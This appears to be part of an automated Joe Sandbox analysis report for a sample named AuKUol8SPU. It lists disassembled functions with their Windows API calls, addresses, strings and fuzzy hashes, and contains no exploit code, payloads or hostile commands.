Instruction Fuzzy Hash: F5217130801609EFDB209F29ED447A9BBE9FB00322F544657F920D71B4EB729991EF94

Function 00B74A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B74ABA
__beginthreadex.LIBCMT ref: 00B74AD8
MessageBoxW.USER32(?,?,?,?), ref: 00B74AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B74B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B74B0A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 2e6a4dafd108aaad31cb128437e0253da5ab87871ef492346a7c12f7f2c89b55
Instruction ID: 22a41a9c3f75bc7cd4aa1ba1cf5f87eedb3270dd69f8d4df8a66a4bddd18a513
Opcode Fuzzy Hash: 2e6a4dafd108aaad31cb128437e0253da5ab87871ef492346a7c12f7f2c89b55
Instruction Fuzzy Hash: A711C876909615BBC7119FB89C04BAB7FECEB45321F1482AAF828D3360DB75CD0487A1

Function 00B68202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B6821E
GetLastError.KERNEL32(?,00B67CE2,?,?,?), ref: 00B68228
GetProcessHeap.KERNEL32(00000008,?,?,00B67CE2,?,?,?), ref: 00B68237
HeapAlloc.KERNEL32(00000000,?,00B67CE2,?,?,?), ref: 00B6823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B68255

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 603c7790f4f9604e42fe69441e5d7e9a9f7fd9224f8ef4d45de82c3a7f50e2e7
Instruction ID: 2f94d39ac45274c0eb743406fc3a73d79b1e34d47ee0646b48d19f4f33d86bfb
Opcode Fuzzy Hash: 603c7790f4f9604e42fe69441e5d7e9a9f7fd9224f8ef4d45de82c3a7f50e2e7
Instruction Fuzzy Hash: CC016DB1604205BFDB204FA5DD48D7B7BACEF8A765B50057AF909C3220DE318C40CA60

Function 00B6710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?,?,00B67455), ref: 00B67127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?), ref: 00B67142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?), ref: 00B67150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?), ref: 00B67160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?), ref: 00B6716C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 8c4fef394873e7bb1befc51572fc793f43f3cc13fddf31d715781ba5f48c5ca0
Instruction ID: 3670880becd29da82239fbbeac48a8169294c6c02fcb065d59f186fde9bda6e8
Opcode Fuzzy Hash: 8c4fef394873e7bb1befc51572fc793f43f3cc13fddf31d715781ba5f48c5ca0
Instruction Fuzzy Hash: E901BCB2600205ABDB108F24DD84AAA7BECEB457A5F1040A6FD04E3220DF75DD408BA0

Function 00B75244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B75260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B7526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B75276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B75280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B752BC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 396706e747428fa548111d8506d7abd2e15e3bad2a2a4dd458a83f48b6bb81e8
Instruction ID: 95192e922fc459cdc872a40703974a1462464b49a9b7f77e53a6649cdfbd2f19
Opcode Fuzzy Hash: 396706e747428fa548111d8506d7abd2e15e3bad2a2a4dd458a83f48b6bb81e8
Instruction Fuzzy Hash: 90015B31D01A2ADBCF10EFE4E9489EDBBB8FB08711F40419AE955F3152DFB0555087A5

Function 00B6810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B68121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B6812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68157

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 69aa2f191432c758fc734b33c8abd2b56684700585bc59d5431dabfc11c04583
Instruction ID: f4d99af7763e0fde12d64aa01a078a2c8c1cdb08db20128cbbb9d590f66f6908
Opcode Fuzzy Hash: 69aa2f191432c758fc734b33c8abd2b56684700585bc59d5431dabfc11c04583
Instruction Fuzzy Hash: 85F04F71200315AFEB210FA5EC99E7B3BACEF4A768B100176F945D7160CE659941DA60

Function 00B6C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B6C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B6C20E
MessageBeep.USER32(00000000), ref: 00B6C226
KillTimer.USER32(?,0000040A), ref: 00B6C242
EndDialog.USER32(?,00000001), ref: 00B6C25C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 19966fc51171ebde4f9da72f0d9166e6397388a11e93db9a0ed18d81608bcf95
Instruction ID: 3b349bab1caabecf3fe3e68c37dea62ea5cd71dc083851a93dc29009d0de4fcc
Opcode Fuzzy Hash: 19966fc51171ebde4f9da72f0d9166e6397388a11e93db9a0ed18d81608bcf95
Instruction Fuzzy Hash: E201A73050430597EB205B60DD5EBB67BB8FB00705F0442AAA982D24E0DBE86954CB90

Function 00B113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00B113BF
StrokeAndFillPath.GDI32(?,?,00B4B888,00000000,?), ref: 00B113DB
SelectObject.GDI32(?,00000000), ref: 00B113EE
DeleteObject.GDI32 ref: 00B11401
StrokePath.GDI32(?), ref: 00B1141C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b39442283a46e630b3cdbc2afb990d305277aa36b4dbc430ce2f7317f425668e
Instruction ID: ad0c2fb3e96ecd3c5a203672456c749fd48b58eb240260d206baea3cfbbe9f89
Opcode Fuzzy Hash: b39442283a46e630b3cdbc2afb990d305277aa36b4dbc430ce2f7317f425668e
Instruction Fuzzy Hash: 0CF03130001709EBDB215F1AED5D7A87FE8E700336F488266E5298A1F1DB324595EF50

Function 00B7C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B7C432
CoCreateInstance.OLE32(00BA2D6C,00000000,00000001,00BA2BDC,?), ref: 00B7C44A

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

CoUninitialize.OLE32 ref: 00B7C6B7

Strings

.lnk, xrefs: 00B7C3C6, 00B7C3EE, 00B7C3F8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 60561c3f2ed329c289fe5be70a3446f66670ed708d0390a35c47ba9ac6a47c28
Instruction ID: 787068d7ad0752c64f45abc8973e647d1cf65efa024951362b143931154bbc43
Opcode Fuzzy Hash: 60561c3f2ed329c289fe5be70a3446f66670ed708d0390a35c47ba9ac6a47c28
Instruction Fuzzy Hash: BAA14A71108205AFD700EF64C891EABB7ECFF85354F4049ACF155871A2EB71EA49CB62

Function 00B22CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00B30DB6: std::exception::exception.LIBCMT ref: 00B30DEC
Part of subcall function 00B30DB6: __CxxThrowException@8.LIBCMT ref: 00B30E01

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B17A51: _memmove.LIBCMT ref: 00B17AAB

__swprintf.LIBCMT ref: 00B22ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B22D66

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 69ba63f88d57c90ee162c7c95f277cad349d5ed467841267a0b0b0bba3778a5a
Instruction ID: 8ec309ba326c0bbff987be5123bd46c2db2cce2ae5f8f10381913b1109a36301
Opcode Fuzzy Hash: 69ba63f88d57c90ee162c7c95f277cad349d5ed467841267a0b0b0bba3778a5a
Instruction Fuzzy Hash: 6B917D71118211AFC714FF24D896DAEB7F8EF85710F40499DF9859B2A1EA30ED88CB52

Function 00B7B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B14743,?,?,00B137AE,?), ref: 00B14770

CoInitialize.OLE32(00000000), ref: 00B7B9BB
CoCreateInstance.OLE32(00BA2D6C,00000000,00000001,00BA2BDC,?), ref: 00B7B9D4
CoUninitialize.OLE32 ref: 00B7B9F1

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

Strings

.lnk, xrefs: 00B7B99D, 00B7B9AB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 696064c880a893e84102524c5ead7ef730c7c52ef0a49dde032483721b08f389
Instruction ID: 7541e3622afb95c1a2708b799fa74861b14f4e21303f9f3ff9b45a629eb862ed
Opcode Fuzzy Hash: 696064c880a893e84102524c5ead7ef730c7c52ef0a49dde032483721b08f389
Instruction Fuzzy Hash: A2A136756043059FCB00EF14C894E6AB7E5FF89314F548998F8A99B3A1CB31ED46CB91

Function 00B3501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B350AD

Part of subcall function 00B400F0: __87except.LIBCMT ref: 00B4012B

Strings

pow, xrefs: 00B35085, 00B350A2

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 7234ffe104199987361a09973ff388a164e9354cfe6e3474250b8e78bb00fe71
Instruction ID: 219458a4a7c2fd728de592df0176a8ae38648f10cb7b2cf84a3395ba3e887ed2
Opcode Fuzzy Hash: 7234ffe104199987361a09973ff388a164e9354cfe6e3474250b8e78bb00fe71
Instruction Fuzzy Hash: 8E519C6192C90296DB257728CC4236E3BD0DB00710F308DD9F5D5872E9EF358EC4AAC2

Function 00B26192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B26248
_memmove.LIBCMT ref: 00B262E4
_memset.LIBCMT ref: 00B26308

Strings

ERCP, xrefs: 00B261B3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: dad426b4608e4aef284b9951f37ac30d927da1cf0807d79d4d22dedbb95d7724
Instruction ID: 14716e42d86dca64684334d3b80ffc2e729d63e59094d0ab2d79e0e6e2508442
Opcode Fuzzy Hash: dad426b4608e4aef284b9951f37ac30d927da1cf0807d79d4d22dedbb95d7724
Instruction Fuzzy Hash: 05519E71A00715DBDB24DF69D885BABB7E4EF04304F2045FEE84ADB291E774AA44CB80

Function 00B97946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B9F910,00000000,?,?,?,?), ref: 00B979DF
GetWindowLongW.USER32 ref: 00B979FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B97A0C

Strings

SysTreeView32, xrefs: 00B979B1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ef5e5d84d9722e759f8561fad9335cb344ecead68dc3329f80af0fc508f5c1ea
Instruction ID: c8b4d4f6bdfb2bbb48e78092f5e94c27b6a49e90917ad6644be605f7dfe13099
Opcode Fuzzy Hash: ef5e5d84d9722e759f8561fad9335cb344ecead68dc3329f80af0fc508f5c1ea
Instruction Fuzzy Hash: 1D319931254206ABDF118F38DC45BEA77E9EB09324F248765F875A32E0DB31E9518B50

Function 00B973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B97461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B97475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B97499

Strings

SysMonthCal32, xrefs: 00B9742C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: bcc93beb7d438f57ac76d699972a6f5f87750e4f83db04b8ce92b73e54d5ea28
Instruction ID: da110eecfbbf8740cceb0cc6fa6466b28bffecdc64cb0166b756a86e9b74e7b7
Opcode Fuzzy Hash: bcc93beb7d438f57ac76d699972a6f5f87750e4f83db04b8ce92b73e54d5ea28
Instruction Fuzzy Hash: 1621D332550219BBDF118F64CC46FEA3BE9EF48724F110164FE156B2D1DA75AC51CBA0

Function 00B96CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B96D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B96D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B96D70

Strings

Listbox, xrefs: 00B96D08

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 242ff1450a1635097db8cc36df557fcbff753812d37872e22e1478fd6eb5a9e1
Instruction ID: b8586dd3dcb1ee9a7fdc535c6871a488ee35fa0ea8ae5bfa792b0d4175d97c5d
Opcode Fuzzy Hash: 242ff1450a1635097db8cc36df557fcbff753812d37872e22e1478fd6eb5a9e1
Instruction Fuzzy Hash: 1B21C232600118BFDF118F54DC45FBB3BBAEF89760F118178F9549B1A0CA719C5187A0

Function 00B68C4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B68C6D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B68C84
SendMessageW.USER32(?,0000000D,?,00000000), ref: 00B68CBC

Strings

@U=u, xrefs: 00B68CBC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: c9b446d00f4b09bcadd05627999bc0f3b54eef0e3c71159f4d49e7f039007b32
Instruction ID: 143fcba9359f592cce19d6713fa923be2ac3488ac418af4049e8325002a7c25a
Opcode Fuzzy Hash: c9b446d00f4b09bcadd05627999bc0f3b54eef0e3c71159f4d49e7f039007b32
Instruction Fuzzy Hash: 7A21A132601219BBDF20EBA8C841DAFB7FDEF48350F10059AE905E3260DE71AD40DBA4

Function 00B9770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B97772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B97787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B97794

Strings

msctls_trackbar32, xrefs: 00B97749

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
